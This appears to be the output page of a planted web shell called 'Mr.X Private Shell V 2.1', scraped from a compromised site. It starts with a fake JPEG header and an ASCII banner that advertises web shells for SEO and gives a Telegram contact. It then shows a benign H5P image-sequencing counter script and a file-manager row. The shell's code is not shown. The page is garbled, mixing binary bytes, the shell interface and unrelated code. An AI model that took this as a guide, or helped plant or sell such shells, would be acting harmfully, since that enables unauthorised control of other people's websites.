����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
(function (ImageSequencing) {
/**
* ImageSequencing.Counter - Keeps track of the number of times the game is submitted.
*
* @class H5P.ImageSequencing.Counter
* @param {H5P.jQuery} $container
*/
ImageSequencing.Counter = function ($container) {
/** @alias H5P.ImageSequencing.Counter# */
const that = this;
let current = 0;
/**
* update - update the counter
* @private
*/
const update = function () {
$container.text(current);
};
/**
* Increment the counter.
*/
that.increment = function () {
current++;
update();
};
/**
* Revert counter back to its natural state
*/
that.reset = function () {
current = 0;
update();
};
};
}) (H5P.ImageSequencing);
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| 5c7b62030adf126e4594c0b0faf0e5ce1a6bee68 | File | 789 B | 0666 |
|